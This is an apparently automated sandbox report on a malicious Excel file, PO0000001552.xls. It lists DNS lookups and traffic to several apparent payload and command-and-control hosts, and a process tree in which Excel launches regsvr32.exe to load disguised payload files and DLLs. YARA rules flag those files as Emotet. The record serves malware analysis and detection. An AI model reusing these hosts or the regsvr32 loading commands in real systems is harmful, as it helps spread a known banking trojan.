                                                                                                                                            Nov 13, 2022 19:26:52.385580063 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385627031 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385651112 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385713100 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385724068 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385766983 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385795116 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385854006 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385864019 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385907888 CET4969980192.168.2.347.92.35.35
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 13, 2022 19:26:49.247679949 CET5584753192.168.2.31.1.1.1
                                                                                                                                            Nov 13, 2022 19:26:49.745223999 CET53558471.1.1.1192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:51.035073042 CET6421353192.168.2.31.1.1.1
                                                                                                                                            Nov 13, 2022 19:26:51.582151890 CET53642131.1.1.1192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:57.543345928 CET5228153192.168.2.31.1.1.1
                                                                                                                                            Nov 13, 2022 19:26:57.751965046 CET53522811.1.1.1192.168.2.3
                                                                                                                                            Nov 13, 2022 19:27:02.730665922 CET6317753192.168.2.31.1.1.1
                                                                                                                                            Nov 13, 2022 19:27:03.479362965 CET53631771.1.1.1192.168.2.3
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Nov 13, 2022 19:26:49.247679949 CET192.168.2.31.1.1.10xa733Standard query (0)datie-tw.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:26:51.035073042 CET192.168.2.31.1.1.10xa2a2Standard query (0)sbm.xinmoshiwang.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:26:57.543345928 CET192.168.2.31.1.1.10xa26Standard query (0)copunupo.ac.zmA (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:27:02.730665922 CET192.168.2.31.1.1.10x5c13Standard query (0)ly.yjlianyi.topA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Nov 13, 2022 19:26:49.745223999 CET1.1.1.1192.168.2.30xa733No error (0)datie-tw.com175.98.167.165A (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:26:51.582151890 CET1.1.1.1192.168.2.30xa2a2No error (0)sbm.xinmoshiwang.com47.92.35.35A (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:26:57.751965046 CET1.1.1.1192.168.2.30xa26No error (0)copunupo.ac.zm41.63.0.22A (IP address)IN (0x0001)false
                                                                                                                                            Nov 13, 2022 19:27:03.479362965 CET1.1.1.1192.168.2.30x5c13No error (0)ly.yjlianyi.top81.68.152.197A (IP address)IN (0x0001)false
                                                                                                                                            • datie-tw.com
                                                                                                                                            • copunupo.ac.zm
                                                                                                                                            • 182.162.143.56
                                                                                                                                            • sbm.xinmoshiwang.com
                                                                                                                                            • ly.yjlianyi.top

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:19:26:43
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
                                                                                                                                            Imagebase:0x7ff62cde0000
                                                                                                                                            File size:64367408 bytes
                                                                                                                                            MD5 hash:23CAD504B3E04BB54CD636AD2874041A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:19:26:50
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                                                                                                                                            Imagebase:0x7ff7208c0000
                                                                                                                                            File size:24064 bytes
                                                                                                                                            MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:19:26:54
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                                                                                                                                            Imagebase:0x7ff7208c0000
                                                                                                                                            File size:24064 bytes
                                                                                                                                            MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:moderate

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:19:26:57
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
                                                                                                                                            Imagebase:0x7ff7208c0000
                                                                                                                                            File size:24064 bytes
                                                                                                                                            MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:19:27:00
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                                                                                                                                            Imagebase:0x7ff7208c0000
                                                                                                                                            File size:24064 bytes
                                                                                                                                            MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:19:27:03
                                                                                                                                            Start date:13/11/2022
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
                                                                                                                                            Imagebase:0x7ff7208c0000
                                                                                                                                            File size:24064 bytes
                                                                                                                                            MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate

                                                                                                                                            No disassembly